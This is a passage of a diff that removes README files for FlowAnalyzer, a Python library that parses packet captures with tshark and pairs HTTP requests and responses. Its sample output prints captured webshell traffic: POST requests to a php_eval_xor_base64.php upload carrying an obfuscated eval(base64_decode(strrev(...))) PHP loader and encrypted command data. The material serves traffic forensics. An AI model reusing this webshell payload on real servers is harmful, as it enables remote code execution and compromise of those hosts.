QDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
82
- 序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
83
- [+] 正在处理第2个HTTP流!
84
- 序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%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%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
85
- 序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
86
- ...
87
- ```
88
-
89
- # Contributing
90
- Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
91
-
92
- # License
93
-
94
- This project is licensed under the [MIT License.](LICENSE)
@@ -1,76 +0,0 @@
1
- # FlowAnalyzer
2
-
3
- # 安装
4
-
5
- 使用 `pip` 安装:
6
-
7
- ```
8
- pip3 install FlowAnalyzer
9
- ```
10
-
11
- ```
12
- pip3 install FlowAnalyzer -i https://pypi.org/simple
13
- ```
14
-
15
- # 快速上手
16
-
17
- 如果您安装 `WireShark` 没有修改安装目录,默认 `tshark` 路径会如下:
18
-
19
- ```python
20
- # windows
21
- tshark_path = r"C:\Program Files\Wireshark\tshark.exe"
22
- ```
23
-
24
- 您确定路径没有问题,那也无需任何配置即可使用!
25
-
26
- 否则,您需要修改 `python安装目录\Lib\site- packages\FlowAnalyzer\Path.py` 中的变量 `tshark_path` 改为您的安装目录
27
-
28
- ```
29
- $ git clone https://github.com/Byxs20/FlowAnalyzer.git
30
- $ cd ./FlowAnalyzer/
31
- ```
32
-
33
- 使用 `python3 .\tests\demo.py` 看是否能输出正确的运行结果,测试代码如下:
34
-
35
- ```python
36
- # sourcery skip: use-fstring-for-formatting
37
- import os
38
- from FlowAnalyzer import FlowAnalyzer
39
-
40
-
41
- baseDir = os.path.dirname(os.path.abspath(__file__))
42
- flowPath = os.path.join(baseDir, "flow.pcapng")
43
- display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
44
-
45
- jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
46
- for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
47
- print(f"[+] 正在处理第{count}个HTTP流!")
48
-
49
- request, response = http.request, http.response
50
- if request:
51
- request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
52
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
53
-
54
- if response:
55
- response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
56
- print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
57
- ```
58
-
59
- 运行结果:
60
-
61
- ```
62
- [+] 正在处理第1个HTTP流!
63
- 序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
64
- 序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
65
- [+] 正在处理第2个HTTP流!
66
- 序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
67
- 序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
68
- ...
69
- ```
70
-
71
- # Contributing
72
- Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
73
-
74
- # License
75
-
76
- This project is licensed under the [MIT License.](LICENSE)